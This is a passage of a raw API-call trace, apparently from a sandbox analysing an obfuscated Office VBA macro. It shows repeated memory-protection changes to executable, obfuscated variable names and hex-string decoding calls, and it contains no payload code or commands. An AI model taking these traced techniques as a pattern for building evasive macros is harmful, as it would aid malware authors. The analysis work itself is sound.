FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa62a8, dwSize=0x14) returned 1 [0105.500] VirtualProtect (in: lpAddress=0xcaa62a8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1972ac | out: lpflOldProtect=0x1972ac*=0x40) returned 1 [0105.501] GetCurrentProcess () returned 0xffffffff [0105.501] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa62a9, dwSize=0x2) returned 1 [0105.501] GetCurrentProcess () returned 0xffffffff [0105.501] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa62c8, dwSize=0x14) returned 1 [0105.501] VirtualProtect (in: lpAddress=0xcaa62c8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1972ac | out: lpflOldProtect=0x1972ac*=0x40) returned 1 [0105.501] GetCurrentProcess () returned 0xffffffff [0105.501] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa62c9, dwSize=0x2) returned 1 [0105.502] GetAsyncKeyState (vKey=3) returned 0 [0105.502] CRetailMalloc_Alloc () returned 0xcac7950 [0105.502] memcpy (in: _Dst=0xaf5168, _Src=0x1973e8, _Size=0x4 | out: _Dst=0xaf5168) returned 0xaf5168 [0105.502] memcpy (in: _Dst=0xaf5270, _Src=0x197404, _Size=0xc | out: _Dst=0xaf5270) returned 0xaf5270 [0105.502] memcpy (in: _Dst=0xaf5168, _Src=0x1973e8, _Size=0x4 | out: _Dst=0xaf5168) returned 0xaf5168 [0105.502] memcpy (in: _Dst=0xaf5168, _Src=0x1973bc, _Size=0x4 | out: _Dst=0xaf5168) returned 0xaf5168 [0105.502] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="\x96\x96\x97\x96\x96\x96\x97\x96\x96\x96\x97", cchCount1=-1, lpString2="\x97\x96\x97\x97\x96\x97\x97\x96\x97\x96\x96", cchCount2=-1) returned 1 [0105.503] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="\x96\x96\x96\x96\x96\x97\x97\x96\x96\x97\x96", cchCount1=-1, lpString2="\x97\x96\x97\x97\x96\x97\x97\x96\x97\x96\x96", cchCount2=-1) returned 1 [0105.503] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="\x96\x96\x96\x97\x96\x97\x97\x97\x97\x97\x97", cchCount1=-1, lpString2="\x97\x96\x97\x97\x96\x97\x97\x96\x97\x96\x96", cchCount2=-1) returned 1 [0105.503] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9d52e62, cbMultiByte=12, lpWideCharStr=0x197204, cchWideChar=13 | out: lpWideCharStr="—–——–——–—––") returned 12 [0105.503] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9c32d0e, cbMultiByte=12, lpWideCharStr=0x197264, cchWideChar=13 | out: lpWideCharStr="—–——–——–—––") returned 12 [0105.503] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9c32d0e, cbMultiByte=12, lpWideCharStr=0x197264, cchWideChar=13 | out: lpWideCharStr="—–——–——–—––") returned 12 [0105.503] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9c32d0e, cbMultiByte=12, lpWideCharStr=0x197264, cchWideChar=13 | out: lpWideCharStr="—–——–——–—––") returned 12 [0105.503] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="\x96\x96\x97\x96\x96\x96\x97\x96\x96\x96\x97", cchCount1=-1, lpString2="\x97\x96\x97\x97\x96\x97\x97\x96\x97\x96\x96", cchCount2=-1) returned 1 [0105.503] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="\x96\x96\x96\x96\x96\x97\x97\x96\x96\x97\x96", cchCount1=-1, lpString2="\x97\x96\x97\x97\x96\x97\x97\x96\x97\x96\x96", cchCount2=-1) returned 1 [0105.504] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="\x96\x96\x96\x97\x96\x97\x97\x97\x97\x97\x97", cchCount1=-1, lpString2="\x97\x96\x97\x97\x96\x97\x97\x96\x97\x96\x96", cchCount2=-1) returned 1 [0105.504] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9c32d0e, cbMultiByte=12, lpWideCharStr=0x197264, cchWideChar=13 | out: lpWideCharStr="—–——–——–—––") returned 12 [0105.504] CRetailMalloc_Alloc () returned 0xc83f1c0 [0105.504] _mbscpy_s (in: _Dst=0xc83f1c0, _DstSizeInBytes=0xc, _Src=0x9c32d0e | out: _Dst=0xc83f1c0) returned 0x0 [0105.504] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9d10b96, cbMultiByte=19, lpWideCharStr=0x197274, cchWideChar=20 | out: lpWideCharStr="_B_var_—–——–——–—––") returned 19 [0105.504] _mbscpy_s (in: _Dst=0x1972dc, _DstSizeInBytes=0xc, _Src=0x9c32d0e | out: _Dst=0x1972dc) returned 0x0 [0105.504] CRetailMalloc_Free () returned 0x1 [0105.504] memcpy (in: _Dst=0xaf5270, _Src=0xaf5270, _Size=0xc | out: _Dst=0xaf5270) returned 0xaf5270 [0105.504] memcpy (in: _Dst=0xaf5168, _Src=0x1973e8, _Size=0x4 | out: _Dst=0xaf5168) returned 0xaf5168 [0105.504] memcpy (in: _Dst=0xaf516c, _Src=0x1973e8, _Size=0x4 | out: _Dst=0xaf516c) returned 0xaf516c [0105.504] memcpy (in: _Dst=0xaf5168, _Src=0x197254, _Size=0x4 | out: _Dst=0xaf5168) returned 0xaf5168 [0105.505] memcpy (in: _Dst=0xaf5168, _Src=0x197254, _Size=0x4 | out: _Dst=0xaf5168) returned 0xaf5168 [0105.505] memcpy (in: _Dst=0xaf5168, _Src=0x1973e8, _Size=0x4 | out: _Dst=0xaf5168) returned 0xaf5168 [0105.505] memcpy (in: _Dst=0xaf5168, _Src=0x1973e8, _Size=0x4 | out: _Dst=0xaf5168) returned 0xaf5168 [0105.505] memcpy (in: _Dst=0xcac79c4, _Src=0x197484, _Size=0x18 | out: _Dst=0xcac79c4) returned 0xcac79c4 [0105.505] CRetailMalloc_Realloc () returned 0xcac7950 [0105.505] CRetailMalloc_Free () returned 0x1 [0105.505] GetCurrentProcess () returned 0xffffffff [0105.505] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6dcc, dwSize=0x14) returned 1 [0105.505] VirtualProtect (in: lpAddress=0xcaa6dcc, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0105.506] GetCurrentProcess () returned 0xffffffff [0105.506] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6dcd, dwSize=0x2) returned 1 [0105.506] GetCurrentProcess () returned 0xffffffff [0105.506] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6dec, dwSize=0x14) returned 1 [0105.506] VirtualProtect (in: lpAddress=0xcaa6dec, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0105.506] GetCurrentProcess () returned 0xffffffff [0105.506] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6ded, dwSize=0x2) returned 1 [0105.506] GetCurrentProcess () returned 0xffffffff [0105.506] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e0c, dwSize=0x14) returned 1 [0105.506] VirtualProtect (in: lpAddress=0xcaa6e0c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0105.507] GetCurrentProcess () returned 0xffffffff [0105.507] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e0d, dwSize=0x2) returned 1 [0105.507] GetCurrentProcess () returned 0xffffffff [0105.507] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e2c, dwSize=0x14) returned 1 [0105.507] VirtualProtect (in: lpAddress=0xcaa6e2c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0105.507] GetCurrentProcess () returned 0xffffffff [0105.507] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e2d, dwSize=0x2) returned 1 [0105.507] GetCurrentProcess () returned 0xffffffff [0105.507] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e4c, dwSize=0x14) returned 1 [0105.507] VirtualProtect (in: lpAddress=0xcaa6e4c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0105.508] GetCurrentProcess () returned 0xffffffff [0105.508] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e4d, dwSize=0x2) returned 1 [0105.508] GetCurrentProcess () returned 0xffffffff [0105.508] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e6c, dwSize=0x14) returned 1 [0105.508] VirtualProtect (in: lpAddress=0xcaa6e6c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0105.508] GetCurrentProcess () returned 0xffffffff [0105.508] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e6d, dwSize=0x2) returned 1 [0105.508] GetCurrentProcess () returned 0xffffffff [0105.509] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e8c, dwSize=0x14) returned 1 [0105.509] VirtualProtect (in: lpAddress=0xcaa6e8c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0105.509] GetCurrentProcess () returned 0xffffffff [0105.509] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e8d, dwSize=0x2) returned 1 [0105.509] GetCurrentProcess () returned 0xffffffff [0105.509] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6eac, dwSize=0x14) returned 1 [0105.509] VirtualProtect (in: lpAddress=0xcaa6eac, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0105.509] GetCurrentProcess () returned 0xffffffff [0105.509] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6ead, dwSize=0x2) returned 1 [0105.510] GetCurrentProcess () returned 0xffffffff [0105.510] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6ecc, dwSize=0x14) returned 1 [0105.510] VirtualProtect (in: lpAddress=0xcaa6ecc, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0105.510] GetCurrentProcess () returned 0xffffffff [0105.510] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6ecd, dwSize=0x2) returned 1 [0105.510] GetCurrentProcess () returned 0xffffffff [0105.510] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6eec, dwSize=0x14) returned 1 [0105.510] VirtualProtect (in: lpAddress=0xcaa6eec, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0105.511] GetCurrentProcess () returned 0xffffffff [0105.511] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6eed, dwSize=0x2) returned 1 [0105.511] GetCurrentProcess () returned 0xffffffff [0105.511] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6f0c, dwSize=0x14) returned 1 [0105.511] VirtualProtect (in: lpAddress=0xcaa6f0c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0105.512] GetCurrentProcess () returned 0xffffffff [0105.512] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6f0d, dwSize=0x2) returned 1 [0105.512] GetCurrentProcess () returned 0xffffffff [0105.512] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6f2c, dwSize=0x14) returned 1 [0105.512] VirtualProtect (in: lpAddress=0xcaa6f2c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0105.513] GetCurrentProcess () returned 0xffffffff [0105.513] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6f2d, dwSize=0x2) returned 1 [0105.513] GetCurrentProcess () returned 0xffffffff [0105.513] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa82e0, dwSize=0x14) returned 1 [0105.513] VirtualProtect (in: lpAddress=0xcaa82e0, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0105.513] GetCurrentProcess () returned 0xffffffff [0105.513] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa82e1, dwSize=0x2) returned 1 [0105.513] GetCurrentProcess () returned 0xffffffff [0105.513] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8300, dwSize=0x14) returned 1 [0105.513] VirtualProtect (in: lpAddress=0xcaa8300, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0105.514] GetCurrentProcess () returned 0xffffffff [0105.514] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8301, dwSize=0x2) returned 1 [0105.514] GetCurrentProcess () returned 0xffffffff [0105.514] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8320, dwSize=0x14) returned 1 [0105.514] VirtualProtect (in: lpAddress=0xcaa8320, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0105.514] GetCurrentProcess () returned 0xffffffff [0105.514] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8321, dwSize=0x2) returned 1 [0105.514] GetCurrentProcess () returned 0xffffffff [0105.514] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8340, dwSize=0x14) returned 1 [0105.514] VirtualProtect (in: lpAddress=0xcaa8340, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0105.515] GetCurrentProcess () returned 0xffffffff [0105.515] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8341, dwSize=0x2) returned 1 [0105.515] GetCurrentProcess () returned 0xffffffff [0105.515] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8360, dwSize=0x14) returned 1 [0105.515] VirtualProtect (in: lpAddress=0xcaa8360, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0105.515] GetCurrentProcess () returned 0xffffffff [0105.515] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8361, dwSize=0x2) returned 1 [0105.516] GetCurrentProcess () returned 0xffffffff [0105.516] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8380, dwSize=0x14) returned 1 [0105.516] VirtualProtect (in: lpAddress=0xcaa8380, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0105.516] GetCurrentProcess () returned 0xffffffff [0105.516] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8381, dwSize=0x2) returned 1 [0105.516] GetCurrentProcess () returned 0xffffffff [0105.516] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa83a0, dwSize=0x14) returned 1 [0105.516] VirtualProtect (in: lpAddress=0xcaa83a0, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0105.517] GetCurrentProcess () returned 0xffffffff [0105.517] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa83a1, dwSize=0x2) returned 1 [0105.517] GetCurrentProcess () returned 0xffffffff [0105.517] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa83c0, dwSize=0x14) returned 1 [0105.517] VirtualProtect (in: lpAddress=0xcaa83c0, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0105.517] GetCurrentProcess () returned 0xffffffff [0105.517] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa83c1, dwSize=0x2) returned 1 [0105.517] GetCurrentProcess () returned 0xffffffff [0105.517] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa83e0, dwSize=0x14) returned 1 [0105.517] VirtualProtect (in: lpAddress=0xcaa83e0, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0105.518] GetCurrentProcess () returned 0xffffffff [0105.518] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa83e1, dwSize=0x2) returned 1 [0105.518] GetCurrentProcess () returned 0xffffffff [0105.518] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8400, dwSize=0x14) returned 1 [0105.518] VirtualProtect (in: lpAddress=0xcaa8400, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0105.518] GetCurrentProcess () returned 0xffffffff [0105.518] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8401, dwSize=0x2) returned 1 [0105.518] GetCurrentProcess () returned 0xffffffff [0105.518] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8420, dwSize=0x14) returned 1 [0105.518] VirtualProtect (in: lpAddress=0xcaa8420, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0105.519] GetCurrentProcess () returned 0xffffffff [0105.519] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8421, dwSize=0x2) returned 1 [0105.519] GetCurrentProcess () returned 0xffffffff [0105.519] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8440, dwSize=0x14) returned 1 [0105.519] VirtualProtect (in: lpAddress=0xcaa8440, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0105.519] GetCurrentProcess () returned 0xffffffff [0105.519] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8441, dwSize=0x2) returned 1 [0105.519] GetCurrentProcess () returned 0xffffffff [0105.520] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8460, dwSize=0x14) returned 1 [0105.520] VirtualProtect (in: lpAddress=0xcaa8460, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0105.520] GetCurrentProcess () returned 0xffffffff [0105.520] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8461, dwSize=0x2) returned 1 [0105.520] GetCurrentProcess () returned 0xffffffff [0105.520] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8480, dwSize=0x14) returned 1 [0105.520] VirtualProtect (in: lpAddress=0xcaa8480, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0105.521] GetCurrentProcess () returned 0xffffffff [0105.521] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8481, dwSize=0x2) returned 1 [0105.521] GetCurrentProcess () returned 0xffffffff [0105.521] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa84a0, dwSize=0x14) returned 1 [0105.521] VirtualProtect (in: lpAddress=0xcaa84a0, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0105.521] GetCurrentProcess () returned 0xffffffff [0105.521] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa84a1, dwSize=0x2) returned 1 [0105.521] GetCurrentProcess () returned 0xffffffff [0105.521] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa84c0, dwSize=0x14) returned 1 [0105.521] VirtualProtect (in: lpAddress=0xcaa84c0, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0105.522] GetCurrentProcess () returned 0xffffffff [0105.522] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa84c1, dwSize=0x2) returned 1 [0105.522] GetCurrentProcess () returned 0xffffffff [0105.522] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6288, dwSize=0x14) returned 1 [0105.522] VirtualProtect (in: lpAddress=0xcaa6288, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0105.522] GetCurrentProcess () returned 0xffffffff [0105.522] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6289, dwSize=0x2) returned 1 [0105.522] GetCurrentProcess () returned 0xffffffff [0105.522] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa62a8, dwSize=0x14) returned 1 [0105.522] VirtualProtect (in: lpAddress=0xcaa62a8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0105.523] GetCurrentProcess () returned 0xffffffff [0105.523] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa62a9, dwSize=0x2) returned 1 [0105.523] GetCurrentProcess () returned 0xffffffff [0105.523] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa62c8, dwSize=0x14) returned 1 [0105.523] VirtualProtect (in: lpAddress=0xcaa62c8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0105.523] GetCurrentProcess () returned 0xffffffff [0105.523] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa62c9, dwSize=0x2) returned 1 [0105.524] GetAsyncKeyState (vKey=3) returned 0 [0105.526] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.526] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.526] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.526] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.526] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.526] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.526] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0105.526] VarSub (in: pvarLeft=0x197bb4, pvarRight=0x197ba4, pvarResult=0x197b94 | out: pvarResult=0x197b94) returned 0x0 [0105.526] SafeArrayAllocDescriptorEx (in: vt=0x11, cDims=0x1, ppsaOut=0x197b90 | out: ppsaOut=0x197b90) returned 0x0 [0105.526] SafeArrayAllocData (psa=0xc8482a0) returned 0x0 [0105.611] VarBstrCat (in: bstrLeft="&", bstrRight="H", pbstrResult=0x197ac4 | out: pbstrResult=0x197ac4) returned 0x0 [0105.611] VarCmp (pvarLeft=0x197908, pvarRight=0x1978f8, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.611] VarCmp (pvarLeft=0x197908, pvarRight=0x1978f8, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.611] VarCmp (pvarLeft=0x197908, pvarRight=0x1978f8, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.611] VarCmp (pvarLeft=0x197908, pvarRight=0x1978f8, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.611] VarCmp (pvarLeft=0x197908, pvarRight=0x1978f8, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.611] VarCmp (pvarLeft=0x197908, pvarRight=0x1978f8, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.611] VarCmp (pvarLeft=0x197908, pvarRight=0x1978f8, lcid=0x0, dwFlags=0x30001) returned 0x1 [0105.611] VarSub (in: pvarLeft=0x197bb4, pvarRight=0x197ba4, pvarResult=0x197b94 | out: pvarResult=0x197b94) returned 0x0 [0105.611] CRetailMalloc_Alloc () returned 0xcad5fc0 [0105.611] memcpy (in: _Dst=0xaf5168, _Src=0x1973e8, _Size=0x4 | out: _Dst=0xaf5168) returned 0xaf5168 [0105.611] memcpy (in: _Dst=0xaf516c, _Src=0x1973e8, _Size=0x4 | out: _Dst=0xaf516c) returned 0xaf516c [0105.612] memcpy (in: _Dst=0xaf5170, _Src=0x19741c, _Size=0x4 | out: _Dst=0xaf5170) returned 0xaf5170 [0105.612] memcpy (in: _Dst=0xaf516c, _Src=0x1973c8, _Size=0x4 | out: _Dst=0xaf516c) returned 0xaf516c [0105.612] memcpy (in: _Dst=0xaf5170, _Src=0x19741c, _Size=0x4 | out: _Dst=0xaf5170) returned 0xaf5170 [0105.612] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9d51146, cbMultiByte=4, lpWideCharStr=0x197204, cchWideChar=5 | out: lpWideCharStr="Mid") returned 4 [0105.612] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9c31146, cbMultiByte=4, lpWideCharStr=0x197264, cchWideChar=5 | out: lpWideCharStr="Mid") returned 4 [0105.612] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9c31146, cbMultiByte=4, lpWideCharStr=0x197264, cchWideChar=5 | out: lpWideCharStr="Mid") returned 4 [0105.612] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9c31146, cbMultiByte=4, lpWideCharStr=0x197264, cchWideChar=5 | out: lpWideCharStr="Mid") returned 4 [0105.612] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9c31146, cbMultiByte=4, lpWideCharStr=0x197264, cchWideChar=5 | out: lpWideCharStr="Mid") returned 4 [0105.612] CRetailMalloc_Alloc () returned 0xca95518 [0105.612] _mbscpy_s (in: _Dst=0xca95518, _DstSizeInBytes=0x4, _Src=0x9c31146 | out: _Dst=0xca95518) returned 0x0 [0105.613] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9d10bc6, cbMultiByte=11, lpWideCharStr=0x197274, cchWideChar=12 | out: lpWideCharStr="_B_var_Mid") returned 11 [0105.613] CRetailMalloc_Free () returned 0x1 [0105.613] memcpy (in: _Dst=0xaf5168, _Src=0x1973e8, _Size=0x4 | out: _Dst=0xaf5168) returned 0xaf5168 [0105.613] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x6842ded0, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0105.614] memcpy (in: _Dst=0xcad6008, _Src=0x197484, _Size=0x18 | out: _Dst=0xcad6008) returned 0xcad6008 [0105.614] CRetailMalloc_Realloc () returned 0xcad5fc0 [0105.614] CRetailMalloc_Free () returned 0x1 [0105.614] GetCurrentProcess () returned 0xffffffff [0105.614] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6dcc, dwSize=0x14) returned 1 [0105.614] VirtualProtect (in: lpAddress=0xcaa6dcc, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0105.615] GetCurrentProcess () returned 0xffffffff [0105.615] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6dcd, dwSize=0x2) returned 1 [0105.615] GetCurrentProcess () returned 0xffffffff [0105.615] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6dec, dwSize=0x14) returned 1 [0105.615] VirtualProtect (in: lpAddress=0xcaa6dec, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0105.615] GetCurrentProcess () returned 0xffffffff [0105.615] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6ded, dwSize=0x2) returned 1 [0105.615] GetCurrentProcess () returned 0xffffffff [0105.615] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e0c, dwSize=0x14) returned 1 [0105.615] VirtualProtect (in: lpAddress=0xcaa6e0c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0105.616] GetCurrentProcess () returned 0xffffffff [0105.616] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e0d, dwSize=0x2) returned 1 [0105.616] GetCurrentProcess () returned 0xffffffff [0105.616] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e2c, dwSize=0x14) returned 1 [0105.616] VirtualProtect (in: lpAddress=0xcaa6e2c, 